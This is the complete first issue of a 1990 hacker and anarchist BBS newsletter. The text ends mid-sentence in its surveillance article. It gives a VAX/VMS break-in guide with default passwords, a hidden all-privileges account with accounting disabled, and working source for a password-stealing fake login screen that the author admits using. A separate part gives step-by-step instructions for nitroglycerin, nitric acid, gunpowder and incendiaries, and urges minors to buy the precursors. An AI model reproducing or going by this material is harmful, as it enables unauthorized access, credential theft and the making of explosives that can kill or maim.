---------------------------------------------------------------------------- | | | The Supreme Seven [S7] proudly present... | | | | ELEKTRIX Issue 1 | | | | Released May 1990 - Issue 2 in July | | | | | | HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS | | | | | | You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor] | ---------------------------------------------------------------------------- Disclaimer: In no event shall Palm Beach be liable to anyone for special, collateral, incidental, or consequential damages in connection with or arising out of the use of the information within this magazine and sole and exclusive liability to Palm Beach, regardless of any form of action, shall not exceed the purchase price of this magazine (which since it is nothing means we don't owe u nowt!). Moreover, Palm Beach shall not be liable for any claim of any kind whatsoever against the user of these text materials by any other party. Palm Beach makes no warranty, either exp- ressed or implied, including but not limited to any implied warranties of merchantability and fitness for particular purpose, regarding these text materials and makes such materials available solely on an 'as-is' basis. Now that that's over with - PARTY! Well now, this is the first issue of many ELEKTRIX newsletters covering such topics as COMPUTER SECURITY, HACKING, PHREAKING, SAT DECODING, RTTY ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES, PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD. In this issue there are articles on Hacking, Phreaking, Pyrotechnics, anarchy and electronic surveillance. The newsletter is bi-monthly and so the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at any of these boards around the world: HACKERNET (UK) ++44(532)-557739 PALM BEACH BB (UK) ++44(303)-265979 THE LIMELIGHT BBS (USA) 0101-203-834-0367 THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE) If you have an article or some information which you would like to see put to use in the next issue then you can contact us at Palm Beach BBS UK. Please send all e-mail to Deceptor. Higher priviledges available to hackers , phreakers, etc. You can contact S7 at these places too: TCHH - Maxhack/Deceptor/Pop QSD - Alex/Maxhack/Deceptor GHOST - Mail to S7/Deceptor þ Part 1 - Hacking VMS - UAF / False Logon programs, etc. / Pling Wiz þ Part 2 - The Anarchists guide to...pyrotechnics & mischief / Deceptor þ Part 3 - An guide to modern electronic surveillance / Technic þ Part 4 - Make your own tonepad for phone box phreaking / Maxhack þ Part 5 - Freefone interrogation.....The ultimate in lists. / Agent 7 ---------------------- ELEKTRIX ISSUE 1: MAY 1990 --------------------------- ---------------------------------------------------------------------------- | | | ELEKTRIX Issue 1 - Part 1 | | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | | Hacking VAX/VMS + The User Authorisation File | | By Pling Wiz | | | | PALM BEACH BBS UK ++44(303)-265979 | | | ---------------------------------------------------------------------------- INTRODUCTION The VAX is made by DEC (Digital Equipment Corp) and can run a variety of operating systems. In this file i will talk about the VMS (Virtual Memory Operating System), VMS also runs on the PDP-11, both mainframes are 32 bit machines with 32 bit virtual address space. ENTRANCE: When you first connect to a VAX you type either a return, a ctrl-c or a ctrl-y. It will then respond with something similar to this: USERNAME: PASSWORD: The most frequent way of gaining access to a computer is by using a 'default' password, this by the way is not very successful....... When DEC sells a VAX/VMS, the system comes equipped with 4 accounts which are: DEFAULT : This serves as a template in creating user records in the UAF (User Authorization File). A new user record is assigned the values of the default record except where the system manager changes those values. The default record can be modified but can not be deleted from the UAF..... SYSTEM : Provides a means for the system manager to log in with full privileges. The SYSTEM record can be modified but cannot be deleted from the UAF....... FIELD : Permits DIGITAL field service personnel to check out a new system. The FIELD record can be deleted once the system is installed. SYSTEST: Provides an appropriate environment for running the User Environment Test Package (UETP). The SYSTEST record can be deleted once the system is installed. Usually the SYSTEM MANAGER adds,deletes, and modifies these records which are in the UAF when the system arrives, thus eliminating the default passwords, but this is not always the case..... some default passwords which have been used to get in a system are.... USERNAME PASSWORD SYSTEM MANAGER or OPERATOR FIELD SERVICE or TEST DEFAULT USER or DEFAULT SYSTEST UETP or SYSTEST Other typical VMS accounts are : VAX VMS DCL DEMO GUEST GENERAL TEST HELP GAMES DECNET Or a combination of the various usernames and passwords. If none of these get you in , then you should try another system unless you have away of getting an account either by trashing or other means..... YOUR IN!!!!!! You will know that you are in by receiving the prompt of a dollar sign ($). You will be popped into the default directory which is dependent on what account you logged in as. If you get in as system manager (highly unlikely) you have full access.... If you get the FIELD or SYSTEST account , you may or may not have full access, but you may have the privileges to give your self full access. To give privs to yourself: $ SET PROCESS/PRIVS=ALL The VMS system has full help files available by typing HELP. You can use the wildcard character of an '*' to list out info on every command: $ help * When you first logon, it may be to your advantage to get a list of all users currently logged onto the system if there are any at all. You can do this by: $ SHOW USERS VAX/VMS Interactive Users-Total=4 01-may-1989 11:37:21.73 0PAO: DEMO 004C004C TTD2: FIELD 004E02FF TTD1: SYSMAN 0043552E TXB3 TRTRTRRTR 01190057 It is highly recommended that if you are logged on in the day and there are people logged in, especially the system manager or the account you are logged on as appears twice.. log out straight away, and call back later. You do not want to call to late though as the system keeps a record of when each user logs in and out. To communicate with other users or other hackers that are on the system, use the PHONE utility.. $ PHONE Username If the system has DEC-NET you can see what available nodes there are by : $ SHOW NETWORK If you have mail the system will tell you as soon as you logon, simply type: $ MAIL This will invoke the Personal Mail Utility, you can then either read your mail or select help.... DIRECTORIES: To see what you have in your directory type: $ DIR To get a list of directories on the system type: $ DIR *.* When a VAX/VMS is first installed, it comes with 9 directories which are not listed when you execute the DIR *.* command: This directory contains various macro and object libraries. This directory contains files used in managing the operating system. This directory contains text files and help libraries for the HELP library. This is the directory for the error log file (ERRLOG.SYS). This directory contains files used in testing the functions of the operating system. This directory contains system diagnostic programs. This directory contains filesused in applying system updates. This directory contains sample driver programs, user-written system services, and other source programs. This directory contains the executable images of most of the functions of the operating system. Inside these directoriesare files with the following file types: File-Type: Description: command: -------------------------------------------------------------------- .hlp system help file TYPE filename .dat data file TYPE filename .msg message file TYPE filename .doc Documentation TYPE filename .log LOG file TYPE filename .err ERROR msg file TYPE filename .seq sequential file TYPE filename .sys system file FILE-NAME .exe executable file FILE-NAME .com command file COMMAND NAME .bas basic file RUN file-name .txt ascii text file TYPE filename -------------------------------------------------------------------- There are others but you won't see them as much as the above. You can change the directories either by using the CHANGE command or by using the SET DEFAULT command: $ CHANGE or $ SET DEFAULT You can now list and execute the files in this directory without first the directory name followed by the filename as long as you have sufficient access. If you don't have sufficient access you can still view files within directories that you cannot default to by: $ TYPE LOD.MAI;1 This will list the contents of the file LOD.MAI;1 in the directory of The use of wildcards is very helpful when you desire to view all the mail or something on the system. To list out all the users mail if you have access type: $TYPE <*.*>*.MAI;* As you may have noticed mail files have the extension of MAI at the end. The ;1 or ;2 etc are used to number files with the same name. PRIVILEGES Privileges fall into 7 categories according to the damage that the user possessing them could cause to the system: NONE - No privileges NORMAL - minimum privileges to use the system. GROUP - Potential to interfere with members of the same group. DEVOUR - Potential to devour noncritical system-wide resources. SYSTEM - Potential to interfere with normal system operation. FILE - Potential to comprimise file security. ALL - Potential to control the system (wouldn't that be good ahah). THE UAF The User Authorization File contains the names of the users who may log into the system and also contains a record of the users privileges. Each record in the UAF includes the following: 1. Name and Password. 2. User Identification Code(UIC)-- Identifies a user by a group number and a member number. 3. Default file specification --- Has the default device and directory names for file access. 4. Login command file --- Names a command procedure to be executed automatically at login time. 5. Login flags --- Allows the system manager to inhibit the user of the ctrl-y functions and lock user passwords. 6. Priority ---- Specifies the base priority of the process created by the user at login time. 7. Resources --- Limits the system resources the user may perform. 8. Privileges --- Limits the activities the user may perform. If you have SYSTEM MANAGER privileges, you will be able to add,delete, and modify records in the UAF. The AUTHORIZE Utility allows you to modify the information in the UAF. It is usually found in the SYSEXE directory. The commands for AUTHORIZE are: ADD Username Adds a record to the UAF. EXIT (or CTRL-Z) Returns you to command level. HELP Lists the AUTHORIZE commands. LIST Creates a listing file of UAF records. MODIFY Username Modifies a record. REMOVE Username deletes a record. SHOW Displays UAF records. The most useful besides ADD is the SHOW command. SHOW displays reports for selected UAF records. YOU can get a /BRIEF listing of a /FULL listing. BUT before you do that, you may want to make sure no one is logged on besides you,to make sure know one can log on type the following: $ SET LOGINS /INTERACTIVE=0 This establishes the max number of users able to log in to the system, this command does not affect users currently logged on. To list out the userfile do the following: $ SET DEFAULT $ RUN AUTHORIZE UAF> SHOW * /BRIEF UAF Unfortunately you cannot get a listing of passwords,though you can get a listing of all the users as shown above... The passwords are encrypted just like the unix systems. If you have sufficient privs you can create your own account......... UAF> ADD /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY= /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING 1. ADD USERNAME 2. SPECIFY THE PASSWORD YOU WANT TO USE.... 3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A COMMAND ENCLOSED IN BRACKETS.... 4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE...... 5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN. OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC.. 6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY 7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU??? 8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE. LOGGING OFF Simply type: $ LOGOUT BYPASSING THE UAF... ===================== The preferred method of breaking into a locked system is to set the alternat UAF. This method requires setting the system parameter UAFALTERNATE, which defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA If this file is found during a normal login, the system uses it to validate the account and prompts you for the username and password. If this file is not located, the system assumes that the UAF is corrupt and accepts any username and password to log you into the system from the system console. Logins are prohibited from all other locations. NOTE: You can only use this method to log into the system from the console terminal; you cannot use the other terminal lines. To set the alternate UAF ,use the following procedure: 1: Perform a conversational boot.. 2: When the SYSBOOT > prompt appears, enter the following SYSBOOT > SET UAFALTERNATE 1 3: Type CONTINUE and press 4: When the start up procedure completes, log in on the console terminal by entering any username and password when asked to.. The system assigns the following values to your user account: NAME.................. Username. UIC................... [001,004]. COMMAND INTERPRETER... DCL. LOGIN FLAGS........... None. PRIORITY.............. Value of system parameter (DEFPRI). RESOURCES............. Value of the PQL system parameters. PRIVILEGES............ ALL. The process name is usually the name of the device on which you logged in EG opa0.. 5: Fix the problem that caused you to be locked out of the system. That is, make the necessary repairs to the UAF or to the start up or login procedures . (If you modify a login or startup procedure and the problem is still not solved, restore procedure to its previous state. If the problem is a forgotten password, reset the UAFALTERNATE system param to 0, as explained in the next step. Then enter the authorize utility and then type HELP MODIFY for info on modifying passwords... 6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN commands. To run SYSGEN, enter the following commands at the DCL prompt: $ RUN SYS$SYSTEM:SYSGEN The SYSGEN prompt is then displayed, then enter the following commands: SYSGEN > SET UAFALTERNATE 0 SYSGEN > WRITE CURRENT SYSGEN > EXIT 7: Shutdown and reboot the system. Emergency startup after modifying system paramaters. In some cases, modifying system parameters may cause the system to become unbootable. If this occurs, use the following emergency startup procedure to restore normal operation..... 1: Perform a conversational boot.... 2: When the SYSBOOT > prompt appears enter the following commands: SYSBOOT > USE DEFAULT.PAR SYSBOOT > CONTINUE 3: When the system finishes booting, review any changes you made to SYSGEN parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN. BYPASSING STARTUP AND LOGIN =========================== If the system does not complete the startup procedures or does not allow you to log in , bypass the startup and login procedures by following these steps 1: Perform a conversational boot.. 2: define the console to be the startup procedure by entering the following commands at the SYSBOOT > prompt: SYSBOOT > SET/STARTUP OPA0: Type continue and press in response to the next SYSBOOT > prompt. Wait for the DCL prompt to return..... 3: Correct the error condition that caused the login failure. That is, make the necessary repairs to the startup or login procedures, or to the UAF. You may want to enter the following DCL commands because bypassing the startup procedures leaves the system in a partially initialized state: $ SET NOON $ SET DEFAULT SYS$SYSROOT:[SYSEXE] Invoke a text editor to correct the startup or login procedure file. Note that some system consoles may not supply a screen mode editor. 4: Reset the startup procedure by invoking SYSGEN and entering the following commands: $ RUN SYS$SYSTEM:SYSGEN SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM SYSGEN > WRITE CURRENT SYSGEN > EXIT 5: Perform a normal startup by entering the following command: $ @SYS$SYSTEM:STARTUP To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from any terminal and any priveleged account with the following DCL command: $ @SYS$SYSTEM:SHUTDOWN EMERGENCY SHUTDOWN WITH OPCRASH =============================== This describes how to halt the system immediately without performing any of the functions that ensure an orderly shutdown. You use the OPCRASH procedur only if SHUTDOWN.COM FAILS...... To perform this procedure you must have CMKRNL privilege. You can enter the commands from ANY terminal. 1: Enter the following command to force an immediate shutdown of the system $ RUN SYS$SYSTEM:OPCRASH 2: At the system console the following message is displayed SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM. 3: Halt the system e.g. emergency shutdown using opcrash... $ RUN SYS$SYSTEM:OPCRASH GENERAL MAINTENANCE OF THE UAF. =============================== To disable an account use the following command: UAF > MODIFY USERNAME/FLAGS=DISUSER The login flag disuser disables the account and prevents anyone from loggin into the account. To enable the account when it is needed, run AUTHORIZE and specify the following command: UAF > MODIFY USERNAME/FLAGS=NODISUSER MODIFYING A USER ACCOUNT. ========================= Use the AUTHORIZE command MODIFY to change any of the fields in an existing user account. The following command is used to change a users password. UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD LISTING USER ACCOUNTS. ====================== Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a summary of all user records in the UAF, as follows: UAF > LIST %UAF-I-LSTMSG1, WRITING LISTING FILE %UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE. By default the LIST command produces a brief report containing the followin info from the UAF: ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY, DEFAULT DISK AND DIRECTORY. Use the /FULL qualifier to create a full report of all the info contained within the UAF..... ENABLING SECURITY ALARMS. ========================= To enable security auditing, specify the dcl command SET AUDIT in the following format: $ SET AUDIT/ALARM/ENABLE = KEYWORD [...] Select the events to be audited by specifying one or more of the keywords to the /ENABLE qualifier.... ACL.......... Event requested by an acl on a file or global section.. ALL.......... All possible events.. AUDIT........ Execution of the SET AUDIT command.. AUTHORIZATION modifications to the system UAF file, network proxy, authorization file,rights database, or changes to system and user passwords.. BREAKIN...... Successful breakin attempt.. FILE ACCESS.. Selected types of access (privileged + non privileged) to files + global sections.. INSTALL...... Installation of images.. LOG FAILURE.. Failed login attempt.. LOGIN........ Successful login attempt.. MOUNT........ Volume mounts + dismounts.. ENABLING ALARM MESSAGES ======================= After you enable a security operator terminal, enable specific alarm events with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the security operator terminal when the selected events occur. AUDIT REDUCTION FACILITY. ========================= If you have enabled security alarms, the operating system writes the information about these alarms to the security operators log file. To extract all of the security alarm info from the current operators log file (SYS$MANAGER:OPERATOR.LOG) execute this command: $ @SYS$MANAGER:SECAUDIT Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the records to a file, include the file spec with the /OUTPUT qualifier.. The following command writes the records to the file BREAKINS.DAT in the user current directory.. $ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT SIMPLE DECOY PROGRAM ~~~~~~~~~~~~~~~~~~~~ This is a decoy program that runs on the vax/vms system.. It does work because i have used it at the local college of FE, to steal passwords and accounts whilst working there.... The program now follows:- $ clear $ set term/noecho/notype $ SYSNAM:=(nodename) $begin: $ read/error=begin/prompt="" sys$command ret $ write sys$output "" $ID: $ wait 00:00:00.5 $ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***" $ write sys$output "" $ write sys$output "" $ wait 00:00:01 $ set term/echo $ askquest: $ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest $ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL $ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID $ if quest .nes. "" then goto askpass $eof: $ write sys$output "Error reading command input" $ write sys$output "End of file detected" $ goto begin $fail: $ write sys$output "Error reading command input" $ write sys$output "Timeout period expired" $ goto begin $askpass: $ set term/noecho $ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass $ set term/echo $ open/write file data.dat $ write file quest $ write file pass $ write file f$time() $ close file $ set term/lowercase $ write sys$output "User authorization failure" $ read/error=begin/prompt ="" sys$command ret $ stop/id='f$getjpi("","PID") Notes about use... 1... change the welcoming message of the program to what is actually seen on your vax... 2... why not put at the top of the program the logout procedure of someone else.. because a blank screen looks a bit suspicious... just copy the log out statement and put it between a sys$output command in the program .. not forgetiing to take the clear command out haha ------------------- Palm Beach BBS ++44(303)-265979 ------------------------ ---------------------------------------------------------------------------- | | | ELEKTRIX Issue 1 - Part 2 | | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | | The Anarchists guide to...Pyrotechnic mischief | | by Deceptor | | | | PALM BEACH BB UK ++44(303)-265979 | | | ---------------------------------------------------------------------------- MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher! Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists guide to...' This first file will contain basic information on pyrotechnics and other 'bits n pieces' useful for a good laugh. In this file you will find information on how to make the following: Fuse Paper Auto-Firelighters Low-explosive: Gunpowder Hi-explosive : Nitro-Glycerin Hot Stuff FUSE PAPER Useful for making the fuses for bangers (firecrackers) and other slow-burn fuse applications. You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask for some Sodium Chlorate weedkiller. You're meant to be 18 by law but if you're not it doesn't usually stop them selling you it. Newspaper/Tracing Paper The Sodium Chlorate in the weedkiller is unlikely to be more than about 65% pure - this is not a problem if you're not worried about how quickly it will burn as fuse paper but if you are using the fuses in a lot of wind or are going to through them as part of a firecracker you will have to concentrate the Sodium Chlorate and remove impurities as much as possible beforehand as follows: Make a saturated solution of the weedkiller (ie.dissolve as much of it as you can in very hot water) then filter off any remaining crystals. Then heat the solution very hot in a dish - then when crystals start forming around the rim heat more gently and then leave to cool - after some time u will have crystals with gunge all over them - wash them and filter off any rubbish. This is really simple to make but quite effective...Just take the Sodium Chlorate (pure or weedkiller) and then make a solution of it (put in water). Then soak the paper in the water and leave to dry on a radiator. When the paper is dry it will burn with some loud pops and just as fusepaper so you have made your own fuses. Now to put the fuses to work....(hehe) GUNPOWDER Gunpowder is great stuff - though not really as exciting as plastic or high-explosive it can be good fun for fireworks, bangers and not so large explosions. You will need: Sulphur - Obtain this from your chemist. Yup! Just ask for 'flowers of sulphur' (what a stupid name for it!) Carbon - Best just to use crushed charcoal for this. Potassium - Get this from a gardenshop (ask for Saltpetre). Nitrate Can also use Sodium Nitrate in 'Weedol weed- killer' - but not actually as good. Making gunpowder from this is just too easy.....Just grind each substance until it is a fine powder....then mix them in the following ratio: Potassium Nitrate : Sulphur : Carbon 1 : 3 : 7 Once mixed well you have made gunpowder - pack it in a confined space - add a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It can be great fun. If you want to light the gunpowder with a short delay of about twenty seconds or so without the need for matches or lighters then use a FIRELIGHTER as shown next. FIRELIGHTER Not really much to this but useful for delayed firelighting with the use of matches or lighting materials. You will need: Glycerin - Get it from your kitchen/medicine drawer. Potassium - This is now more commonly referred to as Permanganate potassium (vii) manganate and can be picked up at the chemist. If they ask you what you want it for just say 'water-purification'. Sugar - If you can't get this; you really are lame! Ok. Take the stuff separately in the following proportions: Glycerin : Potassium Permanganate : Sugar 3 : 9 : 1 Crush the sugar and the glycerin up real well (icing sugar works well) then just pour the glycerin on top and watch - change the proportions a bit and you can have some real fun - try putting a bit of Sulphur in! Hehehehe You can also use this as a detonator for a low-explosives such as gunpowder as it doesn't go out easily!!! Also if you get a lot of it and a good ratio it can be used as a good smoke bomb for indoors since you can run off and it's not going then a minute later there's sweet smoke * EVERYWHERE * and phuck it doesn't set most smoke alarm detectors off! NITROGLYCERIN Contrary to what people may have told you: 1) It's very easy to make (if you have the fractional distillation gear). 2) It doesn't blow up when you drop it - cos homemade isn't usually pure enough. Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery acid or crack open a battery (dumper truck batteries are cool - can give 400 amps current output!!! Whew!) You can sometimes get it at harbours. Sodium Nitrate - Weedkiller - this time get the 'WEEDOL' one with Sodium Nitrate in it or any one with Sodium Nitrate. Glycerin - From kitchen as before. Now the thing with this is that in order to actually MAKE nitroglycerin you will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The sulphuric is easy to do - battery acid is roughly 69% pure - the rest being water. The best way to get conc. sulphuric therefore is to heat the acid to * VERY * hot (400 degrees plus) and then leave it for a long time until its acidity increases a great deal (like well nasty!). Get a litre of Sulphuric acid concentrated and store it in a glass bottle. [Wash yer hands too - its not nice stuff]. Now getting the Nitric acid in any form is well difficult unless you have access to it at college/work etc. The best way I've found is to take Sodium Nitrate weedkiller and do the following: 1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln. and then crystallizing it and washing the crystals and filter off any nasties...Now you have Sodium Nitrate (reasonably pure). 2) Then take the Sodium Nitrate crystals and crush them into a powder or as close as you can get. 3) Now you want to sort of extract the nitrate - for this you will need fair distillation equipment. You are attempting to make Nitric Acid from the Sodium Nitrate by reacting it with some of the Sulpluric acid which was concentrated from before. i) Pour Sulphuric acid in here || |D2|___ D5 <- Nasty gases will be coming out of Put the | _ \ ______ || here - Nitrogen Dioxide (toxic!!!) Sodium | / \ \D3 | ___ \ || Nitrate | | \ \___| | _| |_||_ crystals | | \------| | | | || | <----- Clear container with Nitrogen in here /D1\ /\ |-| |----| Dixode bubbling through the ----> \__/ || |___D4___| water to turn it to Nitric Acid HEAT || That is a cooling bracket (yeh I know it looks nothing like one but thats life with TXT files!)...I hope that solves confusion over the following instructions...Bet it doesn't! hah ii) Right assemble the distillation/fractional distillation equipment or homemade equipment if that's what you've done as shown above. iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and you may want to put some anti-bumping granules in too (tiny bits of glass). iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that comes off early. v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the reaction is real good. When it gets to around 79 degrees (I think) or so then a red sort of mist comes about inside the equipment - don't run like phuck away but be worried all the same since you have to move fast now.....Connect D4 and D5 and make sure you don't breathe in any of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself then read my third Anarchists guide on....chemical weapons (dioxins)]. (It's probably best to make sure you don't breathe the crap in by add- ing a second D4 thing on the end of D5 to filter off as much vapour as possible). vi) Once that's all over then you will have a nice concentrated nitric acid in D4..... [BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run ning water - or you won't get much at all]. NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES... 4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin. Now for the difficult bit! (Haha You thought the worst was over) 5) Right this is a *** VERY *** dangerous bit......... DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN... Get a wooden tray or box and fill it with ICE....make sure there's always ice to stack it up - it * MUST * remain cool. Then get a conical flask (phuck a round-bottomed one)...and a thermometer measuring up to 100 C. Balance the flask carefully and securely in the ice bath and put the thermometer in. Get the Sulphuric, Nitric and glycerin in the following proportions: Glycerin : Conc.Nitric : Conc.Sulphuric 3 : 1 1 I recommend using 1/2 litre quantities of both acids for the first batch. 6) WARNING: You are using conc.acids - they do not like water - they will blow you up if you mistreat them by feeding them water - Make sure all parts inside the equipment are PHUCKING dry. Put the nitric acid into the flask and then * VERY * slowly pour in the sulphuric acid whilst watching the temperature....(use a dropper). MAKE SURE: If the temperature ever goes about 30 degrees C then pour the contents of the flask into the ice bath and run like ****** PHUCK ****** As the temperature rises add the glycerin with a pipette (dropper) and don't pour on any more until the temperature drops and is stable. 7) Repeat this until all the ingredients are gone...... 8) Take the jar (very carefully - it's never blown up on me - but there's a first for everything!) with the mixture of acids in it and look at the bottom - there will be a layer that isn't quite colourless.....This is the stuff you want. [^^^^^ At the bottom] 9) Carefully take off the top acid layer with a dropper/pipette or whatever and store it for later use. 10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully pour on water to wash away the acids. Then let it settle again - repeat this until you are satisfied that the acids are as gone as you can get them - four or five times. 11) Now collect the nitroglycerin in a dry jar or something and carry it back to your fridge in the ice bath (***** VERY CAREFULLY *****). 12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your house when you're watching TV or on your computer). You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's easier to handle and store - add a fuse and you have dynamite. You have now made nitroglycerin - now what to do with it?...... USE OF NITROGLYCERIN Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO need fuming sulphuric acid (a totally different substance). So what to do with it? Well if you want to blow it up you're unlikely to do it without using a lighted fuse/detonator......it needs quite a kick to start itself off. You can use gunpowder if you pack in into a tight space (see earlier) but the best detonation cap I've come across is Mercury (ii) Fulminate - see Part3 of 'The Anarchists guide to...' for information on this and other kinds of detonators. But saying that gunpowder still works well..... An idea (never tried it but worth a go): Try putting this lot in a jar with a fuse hanging out........ ____ ------------| | | -------- Nitroglycerin (not to scale) Fuse |__|_| (made with fuse paper) | | | Gunpowder (used as detonation cap) DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD. *** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! *** If you want to know about more stuff to use your Nitroglycerin for then you can contact me on Palm Beach BBS +44(303)-265979 as Deceptor. HOT STUFF Don't really know what to call this other than 'HOT STUFF' - it gets bloody hot and it eats away at Aluminium in seconds (well almost! heh). 1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking drains. 2) Make sure it's the powder one and take out all the bits of metal. Then mix the leftover powder with water to make a hot and steaming liquid. The mixture will then eat at aluminium, etc and really nicely - It doesn't like bicycles....they tend to disappear after a while. That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry.... Detonators.....Rocket Launchers......Grenades......and more in the next! TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR) -------------------- Palm Beach BBS ++44(303)-265979 ----------------------- ---------------------------------------------------------------------------- | | | ELEKTRIX Issue 1 - Part 3 | | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | | A discussion of Electronic Surveillance techniques | | by The Technic | | | | PALM BEACH BBS UK ++44(303)-265979 | | | ---------------------------------------------------------------------------- Electronic Surviellance Who'd bug me? I hear you ask what for, well just remember that with teh introduction of EPSS in teh sattes and System X over here every call has a log and that log contains who you called, where it was from and how long. In a rec article in the Guardian it pointed out that BT and the police kept 40 people "Under Surviellance" for 9 months before actaully arresting them for telephone fraud. Still think no-one wants to bug you?, well later on there are some hand tips to detect thses bugs but first you need to know what they are: Body Mics. These are just mics which are concealed on the body, then hooked up to a transmitter or a recorder. These range from flat microphones taped to the skin or tieclips, cufflinks, wrist watches whatever you need. Condenser mics need their own power as they modify the power in accordance wit the sound so results in thicker leads. Range: Small and can pick up a lot of background noise Conditions: Close contact, quiet - good for conversations etc. Cost: Relatively cheap. Contact Mics. Spikes. Tube Mics. This allows the eavesdropper to listen in on someone in the next room, they come in several types. Contact Mics These mics respond to vibrations in a sounding board like a door, and are available as pickups for guitars etc. The sounding board can be a door, a window, or a thin wall and only need to be pressed or glued to the board. As the wall gets thicker it is harder ( if not impossible ) to use a contact mic. this can be solved with .... Spikes A spike is a spike of hardened steel which is hammered into the wall and nearl comeout at the other end - but not quite, then a microphone is mounted on the spike which will pick up the vibrations from the next room. Tube Mikes These are simply microphones in a sealed box with a small plastic tube protruding from it. Then connect the mic to an amplifier and then stick the tube where u want (a keyhole) and then listen. You can drill a hole in the wal or use the back to back sockets in hotels, if drilling make sure that no bits plaster fall off - common method of detection. Range: Next room or can be used with a transmitter Conditions: Just needs to be close Cost: The mics are cheap but the radio bugs and associated equipment can be expensive Small Directional Mics. These are designed to be used at short distances and directional so they can pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus be aimed at the target - the briefcase one can be conected to a tape recorder. Pen or sleeve types can be connected to a pocket recorder. A variation is a MI mounted in a small bell shaped object and is held in the hand, then you walk i front of the trget and they will not suspects anyone following from the front. Range: Small and can pick up a lot of background noise Conditions: Useless in a crowded street, or with something between target and Cost: Relatively cheap. Shotugn, Machine Gun, Rifle Mics. These are long distance directional microphones, and often have handles and can resemble guns ( be careful when aiming one of these at someone as they might think it is a gun and you might not be wearing a bullet proof vest). These are then hooked up to an amplifier or tape recorder, swing from left to right and stop when sound is loudest. These can be difficult to conceal and difficult to aim, also without a frequency analyser to level out sounds any background noise can drown the conversation. Range: can be several hundred feet Conditions: calm weather and quiet Cost: expensive with amp and accesories Parabolic Mics. These are very like rifle mikes, usually a large circular metal or plastic dis which reflects sound to a microphone mounted in the centre of the dish. They are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug and difficult to hide. You can hide a rifle mike under a long coat but not a dish unless your a woman who happens to be pregnant. Can use bird song recording as a cover - with a bird book in your pocket etc. tweed jacket. Condenser or Crystal mics best for long range devices, output is usually highe than dynamic mics. These can be bought anywhere - cheap. Range: can be several hundred feet Conditions: calm weather and quiet Cost: expensive with amp and accesories Like rifle MIC. Radio Bugs This is a 